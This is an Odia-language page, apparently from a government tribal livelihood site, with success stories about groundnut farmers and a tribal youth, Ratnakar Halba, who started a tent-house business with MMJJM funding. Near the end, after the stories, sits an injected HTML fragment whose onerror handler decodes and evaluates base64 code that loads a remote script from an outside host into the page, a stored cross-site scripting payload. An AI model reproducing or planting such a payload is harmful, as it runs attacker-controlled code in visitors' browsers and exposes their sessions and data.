ହିତାଧିକାରୀମାନେ ଏକର ପିଛା ୨୫,୦୦୦.୦୦ ଟଙ୍କା ପର୍ଯ୍ୟନ୍ତ ଲାଭ କରିଛନ୍ତି ଯାହାଦ୍ୱାରା ସେମାନଙ୍କର ଆର୍ଥିକ ସ୍ଥିରତା ବୃଦ୍ଧି ପାଇଅଛି  ।  ଏଥିସହ, ସେମାନେ ସ୍ଥାନୀୟ ବ୍ୟବସାୟୀ, କୁଣ୍ଡୁଲି ପରି ନିକଟରେ ଥିବା ବଜାର ଏବଂ ଆନ୍ଧ୍ରପ୍ରଦେଶ ଓ ଛତିଶଗଡର ବ୍ୟବସାୟୀଙ୍କ ସହ ଯୋଗାଯୋଗରେ ରହିଥିବାରୁ ଅମଳ କରିଥିବା ଚୀନା ବାଦାମ ବିକ୍ରୟ କରିବାରେ କୌଣସି ଅସୁବିଧାର ସମ୍ମୁଖୀନ ହୋଇ ନାହାନ୍ତି  ।  ବିଭାଗର ବିଭିନ୍ନ ଯୋଜନାରୁ ଉପକୃତ ହୋଇ ହିତାଧିକାରୀମାନେ ସେମାନଙ୍କର ଚାଷ ଏବଂ ବିକ୍ରୟରୁ ବହୁ ଲାଭ ହାସଲ କରିଛନ୍ତି  ।  ସେମାନେ ବର୍ତ୍ତମାନ ସେମାନଙ୍କର ଚାଷ କରୁଥିବା ଜମିର ପରିମାଣକୁ ବୃଦ୍ଧି କରିବାକୁ ଏବଂ ଅମଳକୁ ଚଳିତ ବର୍ଷ ୧୬୦୦.୦୦ ରୁ ୧୮୦୦.୦୦ ଟଙ୍କାରେ ବିକ୍ରି କରିବାକୁ ଯୋଜନା କରିଛନ୍ତି ।   ବର୍ତ୍ତମାନ, ସେମାନେ ତୈଳ ଉତ୍ପାଦନ ପାଇଁ ଦୁଇରୁ ତିନୋଟି ପ୍ରକ୍ରିୟାକରଣ ୟୁନିଟ୍ ଆବଶ୍ୟକ କରୁଛନ୍ତି ଏବଂ ସେମାନଙ୍କର ମୂଲ୍ୟ ଯୋଗ ସମ୍ପର୍କିତ ଦକ୍ଷତା ବୃଦ୍ଧି ନିମନ୍ତେ ପ୍ରଶିକ୍ଷଣର ବ୍ୟବସ୍ଥା ପାଇଁ ସହଯୋଗ ଆଶା କରୁଛନ୍ତି  । "ଚାଷ ଜରିଆରେ ଆମର ଉନ୍ନତ ଅର୍ଥନୈତିକ ବିକାଶ ନିମନ୍ତେ ଥିବା ସୁଯୋଗକୁ ନେଇ ମୁଁ ଉତ୍ସାହିତ ଅଟେ; ଆମର କୃଷି ଉତ୍ପାଦନର ପ୍ରକ୍ରିୟାକରଣ ଏବଂ ଏଥିରେ ଅଧିକ ମୂଲ୍ୟ-ଯୋଗ କରିବା ନିମନ୍ତେ ଉନ୍ନତ ମାନର ଆଧୁନିକ କୃଷି ଯନ୍ତ୍ରପାତି ଏବଂ ପ୍ରଶିକ୍ଷଣ ପାଇବାକୁ ଆଶା ରଖିଅଛି – ଦାମ ନାୟକ (ଚୀନା ବାଦାମ ଚାଷୀ) ।  ମିଶନ୍ ଜୀବିକା ଏବଂ ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍ ପରି ପଦକ୍ଷେପ ମାଧ୍ୟମରେ, ହିତାଧିକାରୀମାନେ ସେମାନଙ୍କର ଚାଷ ପ୍ରଣାଳୀକୁ ପୁନଃ-ଜୀବିତ କରିଛନ୍ତି, ଫଳସ୍ୱରୂପ ସେମାନଙ୍କର ଆର୍ଥିକ ଉନ୍ନତି ବୃଦ୍ଧି ପାଇଛି । ଯତ୍ନଶୀଳ ଯୋଜନା ଏବଂ ଗୋଷ୍ଠୀ ସହଯୋଗରେ, ସେମାନେ କେବଳ ଉଲ୍ଲେଖନୀୟ ଲାଭ ହାସଲ କରିନାହାଁନ୍ତି ବରଂ ସ୍ଥାୟୀ ଗ୍ରାମୀଣ ବିକାଶର ସମ୍ଭାବନାକୁ ମଧ୍ୟ ଉତମ ରୂପେ ପ୍ରଦର୍ଶନ କରିପାରିଛନ୍ତି ।

27 Apr, 2024
ସଂଘର୍ଷଠାରୁ ସଫଳତା ପର୍ଯ୍ୟନ୍ତ: ଜନଜାତି ସମ୍ପ୍ରଦାୟର ଜଣେ ଲଘୁ-ଉଦ୍ୟୋଗୀ ଭାବେ ରତ୍ନାକରଙ୍କ କାହାଣୀ

କୋରାପୁଟ ଜିଲ୍ଲାର ଜୟପୁର ବ୍ଲକ ଅନ୍ତର୍ଗତ ଏକ ବିଚ୍ଛିନ୍ନ ଗ୍ରାମ ତଥା “ରାଣ୍ଡାପାଲି ଜନଜାତି ଜୀବିକା ପରିଷଦ”ର ଜଣେ ସକ୍ରିୟ ସଦସ୍ୟ ରତ୍ନାକର ହାଲବା ଠିକ୍ ସେହି ସବୁ ସମସ୍ୟା ମଧ୍ୟ ଦେଇ ଗତି କରନ୍ତି ଯେଉଁ ସମସ୍ୟା ଗୁଡିକ ତାଙ୍କ ଅଞ୍ଚଳର ଅନ୍ୟାନ୍ୟ ଯୁବକ ଯୁବତୀ ମାନେ ମଧ୍ୟ ସମ୍ମୁଖିନ ହୋଇ ଥାଆନ୍ତି ଯେପରିକି, ରୋଜଗାର ନିମନ୍ତେ ସୁଯୋଗର ଅଭାବ ଏବଂ ଆର୍ଥିକ ଅଗ୍ରଗତି ପାଇଁ ସୁବିଧା ସୁଯୋଗର ଅଭାବ ଇତ୍ୟାଦି । ଆଇଟିଡିଏ ଜୟପୁର ଦ୍ୱାରା ଆୟୋଜିତ ହୋଇଥିବା ଏକ ଜେଜେପି ବୈଠକରେ ରତ୍ନାକରଙ୍କୁ ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍ କାର୍ଯ୍ୟକ୍ରମ ଅଧୀନରେ ଜନଜାତି ଯୁବ ଲଘୁ ଉଦ୍ୟୋଗୀ (TYME) ବିକାଶ ପଦକ୍ଷେପ ସମ୍ପର୍କରେ ସୂଚନା ମିଳିଥିଲା, ଯାହାକି ଆଶାୟୀ ଜନଜାତି  ଯୁବକମାନଙ୍କୁ ସେମାନଙ୍କ ଉଦ୍ୟୋଗୀ କାର୍ଯ୍ୟରେ ସହାୟତା କରିବା ପାଇଁ ପରିକଳ୍ପନା କରାଯାଇଥିଲା । ତାଙ୍କର ଉଦ୍ୟୋଗୀ ଆକାଂକ୍ଷା ହାସଲ କରିବାର ସୁଯୋଗରେ ଉତ୍ସାହିତ ହୋଇ ରତ୍ନାକର ଏକ ଟେଣ୍ଟ ହାଉସ୍ ବ୍ୟବସାୟ ଆରମ୍ଭ କରିବାକୁ ଏହି ଯୋଜନା ମାଧ୍ୟମରେ ସହାୟତା ପାଇଁ ଆବେଦନ କରିଥିଲେ । ଆଇ.ଟି.ଡି.ଏ, ଜୟପୁର ର ଏସ୍.ଏମ୍.ଏସ୍ (ଏସ୍.ଏମ୍ ଓ  ଆଇ.ବି) ଙ୍କର ସହଯୋଗ ଏବଂ ମାର୍ଗଦର୍ଶନ ଜରିଆରେ, ସେ ତାଙ୍କ ଦୃଷ୍ଟିକୋଣ, ଆଶକରାଯାଉଥିବା ଗ୍ରାହକ ଏବଂ ଆର୍ଥିକ ଆକଳନକୁ ଦର୍ଶାଇ ଏକ ପୁଙ୍ଖାନୁପୁଙ୍ଖ ବ୍ୟବସାୟ ଯୋଜନା (ବି.ଡ଼ି.ପି) ପ୍ରସ୍ତୁତ କରିଥିଲେ । ତାଙ୍କ ପ୍ରସ୍ତାବର ଅନୁମୋଦନ ପରେ ରତ୍ନାକର ଫେବୃଆରୀ, ୨୦୨୪ ରେ ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍ କାର୍ଯ୍ୟକ୍ରମରୁ ୧ ଲକ୍ଷ ଟଙ୍କାର ଆର୍ଥିକ ସହାୟତା ପାଇଥିଲେ ।  ଏହି ସହାୟତା ରାଶି ସହ ନିଜସ୍ଵ ସର୍ବନିମ୍ନ ଅବଦାନ (ମୋଟ ବିନିଯୋଗର ଅନୁନ୍ୟ୨୦%)କୁ  ମିଶାଇ ମୋଟ ୧ ଲକ୍ଷ ୭୦ ହଜାର ଟଙ୍କାର ଟେଣ୍ଟ, ଆସବାବପତ୍ର, ଏବଂ ସାଜସଜ୍ଜା ସାମଗ୍ରୀ କିଣିବା ନିମନ୍ତେ ସକ୍ଷମ ହୋଇଥିଲେ ।  ଏହି ସବୁ ସାମଗ୍ରୀ ଏବଂ ନୂତନ ଜ୍ଞାନ ସହିତ, ରତ୍ନାକର ତାଙ୍କର ଟେଣ୍ଟ ହାଉସ୍ ବ୍ୟବସାୟ ପ୍ରତିଷ୍ଠା କରିଥିଲେ ।  ପ୍ରାରମ୍ଭରେ, ସେ  ମାର୍କେଟିଂ ଏବଂ ଗ୍ରାହକଙ୍କୁ ଆକର୍ଷିତ କରିବାରେ ସମସ୍ୟାର ସମ୍ମୁଖୀନ ହୋଇଥିଲେ । ଅବଶ୍ୟ, ତାଙ୍କର ଲୋକ ସମ୍ପର୍କ, ନୂତନ ଭାବେ ଶିଖିଥିବା ବ୍ୟବସାୟ ପରିଚାଳନା କୌଶଳ ଏବଂ ସେବାଗୁଡିକର ଗୁଣବତ୍ତାକୁ ବ୍ୟବହାର କରି ସେ ଧୀରେ ଧୀରେ ନିଜ ଅଞ୍ଚଳର ଲୋକ ମାନଙ୍କ ମଧ୍ୟରେ ସ୍ୱୀକୃତି ଲାଭ କଲେ ।  ବିବାହ, ପର୍ବ-ପର୍ବାଣି ଏବଂ ସାଂସ୍କୃତିକ ସମାରୋହ ସମେତ ବିଭିନ୍ନ କାର୍ଯ୍ୟକ୍ରମ ପାଇଁ କାମ ପାଇବା ପରେ ତାଙ୍କର ବ୍ୟବସାୟ ବୃଦ୍ଧି ପାଇବାରେ ଲାଗିଲା ।   ଅବିରତ ସମର୍ପଣ ଏବଂ ଗ୍ରାହକମାନଙ୍କ ସନ୍ତୁଷ୍ଟତା ପାଇଁ ଏକ ପ୍ରତିବଦ୍ଧତା ଦ୍ୱାରା ରତ୍ନାକର କେରପୁଟ ଜିଲ୍ଲା ବାହାରେ ଥିବା ପଡୋଶୀ ଗ୍ରାମ ପର୍ଯ୍ୟନ୍ତ ମଧ୍ୟ ନିଜର ବ୍ୟବସାୟ କାର୍ଯ୍ୟକୁ ବଢାଇ ପାରିଥିଲେ ।   ଏଥିସହ, ଜନଜାତି ସମ୍ପ୍ରଦାୟର ଅନ୍ୟ ୬ ଜଣ ସ୍ଥାନୀୟ ଯୁବକଙ୍କୁ ନିଯୁକ୍ତି ଦେଇ ସେ ସେମାନଙ୍କୁ ରୋଜଗାରର ସୁଯୋଗ ଦେବାସହ ସ୍ଥାନୀୟ ନିଯୁକ୍ତିରେ ମଧ୍ୟ ସହଯୋଗ କରିଥିଲେ । ରତ୍ନାକର ବର୍ତ୍ତମାନ ମାତ୍ର ଦେଢ ମାସ ମଧ୍ୟରେ ତିନୋଟି କାର୍ଯ୍ୟକ୍ରମରୁ ୧୫,୦୦୦.୦୦ ଟଙ୍କା ରୋଜଗାର କରିଛନ୍ତି ଏବଂ ଏକ ବର୍ଷ ମଧ୍ୟରେ ସେ ମୋଟ ୧,୮୪,୦୦୦.୦୦ ଟଙ୍କା  ଲାଭା କରିବାର ଆଶା ରଖିଛନ୍ତି  । ରତ୍ନାକରଙ୍କ ଟେଣ୍ଟ ହାଉସ୍ ବ୍ୟବସାୟ କେବଳ ତାଙ୍କର ଆର୍ଥିକ ସ୍ଥିତିରେ ଉନ୍ନତି ଆଣି ନାହିଁ ବରଂ ତାଙ୍କ ସମ୍ପ୍ରଦାୟକୁ ମଧ୍ୟ ଉପକୃତ କରିଛି  ।  ସୁଲଭ ମୂଲ୍ୟରେ ସେବା ପାଇପାରୁଥିବାରୁ ତାଙ୍କ ଅଞ୍ଚଳର ଲୋକମାନେ ଏବେ ଅତିରିକ୍ତ ଆର୍ଥିକ ଭାରର ସମ୍ମୁଖୀନ ନ ହୋଇ ବିଶେଷ ଉତ୍ସବ ପାଳନ କରିପାରିବେ । ରତ୍ନାକରଙ୍କ ଦ୍ରୁତ ସଫଳତା ତାଙ୍କର ସାଥୀ ଜନଜାତି ଯୁବକମାନଙ୍କ ପାଇଁ ଏକ ପ୍ରେରଣାଦାୟକ ଉଦାହରଣ ଭାବରେ କାର୍ଯ୍ୟ କରୁଛି ଏବଂ ସେମାନଙ୍କୁ ଉଦ୍ୟୋଗୀତାକୁ ଏକ ବୃତି ଭାବରେ ଗ୍ରହଣ କରିବାକୁ ପ୍ରୋତ୍ସାହିତ କରୁଛି । "ମୁଁ ଜଣେ ଅତି ସରଳ ଜୀବନଯାପନ କରୁଥିବା ଜନଜାତି ସମ୍ପ୍ରଦାଯର ଯୁବକ । ମୋର ବିଶ୍ୱାସ ଯେ ଆମ ଅଞ୍ଚଳରେ ମୋ ଭଳି ଅନେକ ଯୁବକ ଅଛନ୍ତି ଯେଉଁମାନେ ନିଜେ କିଛି ରୋଜଗାରକରି ନିଜ ପରିବାରକୁ ସାହାଯ୍ୟ କରିବାକୁ ଆଗ୍ରହୀ ଅଟନ୍ତି । ଯଦି ମୁଁ ଏହା କରିପାରୁଛି, ସେମାନେ ମଧ୍ୟ ନିଶ୍ଚୟ ଏହା କରିପାରିବେ । ମୋର ଲକ୍ଷ୍ୟ ହେଉଛି ମୋ ଗାଁର ସାଥୀ ଯୁବକମାନଙ୍କୁ ସଶକ୍ତ କରି ସେମାନକୁ ମଧ୍ୟ ଆତ୍ମନିର୍ଭରଶୀଳ ଲଗୁ-ଉଦ୍ୟୋଗୀ ହେବାରେ ସହାୟତା କରିବା” ।  ରତ୍ନାକରଙ୍କ ଏହି ଯାତ୍ରା ସରକାରୀ ପଦକ୍ଷେପଗୁଡ଼ିକର ପରିବର୍ତ୍ତନଶୀଳ ପ୍ରଭାବକୁ ଦର୍ଶାଇଥାଏ ଏବଂ ବିକାଶ କାର୍ଯ୍ୟକ୍ରମରୁ ବଞ୍ଚିତ ଯୁବକ ମାନଙ୍କୁ ଉଦ୍ୟୋଗୀତା ତଥା ସମ୍ପ୍ରଦାୟର ବିକାଶରେ ସହଯୋଗ କରିବାକୁ ପ୍ରେରଣା ଯୋଗାଇଥାଏ । 

">

"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL2gyMXlzYzZ6bGQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7>

ଅଧିକ ଦେଖନ୍ତୁ